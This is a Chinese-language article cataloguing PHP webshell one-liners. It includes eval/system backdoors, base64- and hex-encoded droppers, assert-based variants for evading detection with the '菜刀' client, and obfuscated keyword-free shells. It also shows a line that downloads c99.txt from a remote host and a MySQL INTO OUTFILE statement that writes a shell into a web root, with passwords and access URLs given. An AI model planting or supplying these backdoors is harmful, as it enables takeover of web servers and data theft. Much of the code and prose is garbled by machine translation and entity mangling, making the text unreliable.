PHP与SQL语句之木马的示例分析

  介绍

这篇文章主要为大家展示了“PHP与SQL语句之木马的示例分析”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“PHP与SQL语句之木马的示例分析”这篇文章吧。

<强>一、基础类的一句话——功能仅限于验证漏洞了强,实际中非常容易被查出出来:

& lt; ? php  @eval ($ _GET [“code"]) ?比;      & lt; ? php  @system ($ _POST [“cmd"]) ?在

<强>二、编码的替换的类型:

& lt; ? php  @fputs (fopen (base64_decode (& # 39; bG9zdC5waHA=& # 39;), w), base64_decode (& # 39; PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==& # 39;)); ?比;//会生成& lt; ? php  @eval ($ _POST [& # 39; lostwolf& # 39;]); ?比;      ,      & lt; script 语言=皃hp"祝辞@fputs (fopen (base64_decode (& # 39; bG9zdC5waHA=& # 39;), w), base64_decode (& # 39; PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==& # 39;)); & lt;/script>//php在html内部的一种嵌入方式      ,      & lt; ? php  fputs  (fopen(包(“H *“,“6 c6f7374776f6c662e706870"),“w"),包装(“H *“,“3 c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e")) ?比;      ,      ,      php & lt; ?      session_start ();      $ _POST[& # 39;代码# 39;),,,,美元_SESSION [& # 39; theCode& # 39;],=,修剪($ _POST[& # 39;代码# 39;]);      $ _SESSION [& # 39; theCode& # 39;],及preg_replace (& # 39; \ & # 39; \ & # 39; eis # 39;, & # 39; e # 39;强生# 39;v # 39;强生# 39;一个# 39;强生# 39;l # 39;强生# 39;(base64_decode ($ _SESSION [\ & # 39; theCode \ & # 39;])) & # 39;, & # 39;一个# 39;);?在

<强>三,其他类型:

& lt; ? php  $ _GET[一]($ _GET [b]); ?比;//?=assert& b=$ {fputs 28 base64_decode % 28 fopen % % 28 yy5waha % 29日w % 29日base64_decode % 28 pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x % 29% 29};      & lt; ? php 断言($ _REQUEST [“pass"]); ?祝辞,,,//菜刀连接,躲避检测,密码pass       & lt; ? php  substr (md5 ($ _REQUEST [& # 39; x # 39;]), 28)==& # 39; acd0& # 39;,, eval ($ _REQUEST[& # 39;通过# 39;]);?比;//菜刀提交,http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为,通过

<强>四,下载类型:

& lt; ? php  echo 副本(“http://www.r57.me/c99.txt",“lostwolf.php");, ?在,      & lt; ?, echo  file_get_contents (“. .//cfg_database.php"); ?祝辞,//显示某文件      & lt; ?, eval  (, file_get_contents(“远程shell")), ?祝辞,//运行远程壳

<强>五,无关键函数类型:

& lt; php ?      $ _=?“;      $ _ [+““]=& # 39;& # 39;;      _=癬"美元霸主地位;“;      $ _=($ _ [+““]|““)。($ _ [+““]|““)。($ _ [+““]^““);      比;      & lt; ? php  ${& # 39; _ # 39;。$ _}[& # 39; _ # 39;](${& # 39; _ # 39;。$ _}[& # 39; __ # 39;]); ?比;      http://site/2.php?_=assert& __=eval ($ _POST[& # 39;通过# 39;]),密码是通过      & lt; ? $ _=啊? _ [+““]=& # 39; _ # 39;; $ _=癬"美元;!”“$ _=($ _[+““]|““)。($ _[+““]|““)。($ _[+““]^““);?在

<强>六、补充知识点:

SQL写一句话(MySQL):

select “& lt; ? php  @system ($ _POST [“pass"]); ?在“,into  outfile “/home/webaccount/projectname/www/* .php"      #前面是一句话内容,后面是绝对路径www下的PHP文件,同理其他脚本也可以

以上是“PHP与SQL语句之木马的示例分析”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注行业资讯频道!

PHP与SQL语句之木马的示例分析